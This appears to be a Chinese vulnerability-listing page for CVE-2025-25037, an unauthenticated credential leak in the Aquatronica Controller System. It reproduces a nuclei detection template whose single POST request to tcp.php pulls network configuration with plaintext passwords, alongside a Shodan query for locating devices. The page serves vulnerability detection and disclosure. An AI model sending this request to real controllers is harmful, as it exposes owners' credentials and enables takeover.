CVE-2025-25037: Aquatronica Controller System <= 5.1.6 - Information Disclosure

日期: 2025-08-01 | 影响软件: Aquatronica Controller System | POC: 已公开

漏洞描述

Aquatronica Controller System firmware 5.1.6 and earlier and web interface 2.0 and earlier contain an information disclosure vulnerability caused by unauthenticated access to tcp.php endpoint, letting remote attackers retrieve sensitive configuration data including plaintext credentials, exploit requires no authentication.

PoC代码[已公开]

id: CVE-2025-25037

info:
  name: Aquatronica Controller System <= 5.1.6 - Information Disclosure
  author: s4e-io
  severity: high
  description: |
    Aquatronica Controller System firmware 5.1.6 and earlier and web interface 2.0 and earlier contain an information disclosure vulnerability caused by unauthenticated access to tcp.php endpoint, letting remote attackers retrieve sensitive configuration data including plaintext credentials, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can retrieve sensitive configuration data including plaintext credentials through the tcp.php endpoint, potentially gaining full administrative access to the controller system.
  remediation: |
    Upgrade to Aquatronica Controller System firmware version 5.1.7 or later and web interface version 2.1 or later that implements proper authentication controls.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
    - https://www.exploit-db.com/exploits/52028
    - https://vulncheck.com/advisories/aquatronica-controller-system-credential-leak
    - https://nvd.nist.gov/vuln/detail/CVE-2025-25037
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H
    cve-id: CVE-2025-25037
    cwe-id: CWE-200
    epss-score: 0.01334
    epss-percentile: 0.79538
  metadata:
    verified: true
    max-request: 1
    vendor: aquatronica
    product: controller
    shodan-query: html:"aquatronica"
  tags: cve,cve2025,aquatronica,info-leak,vkev,vuln

http:
  - raw:
      - |
        POST /tcp.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        function_id=tcp_xml_request&command=WS_GET_NETWORK_CFG

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "WEB_PASSWORD"
          - "pwd=&quot;"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d3e6f93be665382de48453504a575ce03d1962406c66e3f82596610fefd655ed022100ed67db8008591b9b266eda7cbc44e07109d9cfc5374318dd08793b0c904c3217:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-25037.yaml

相关漏洞推荐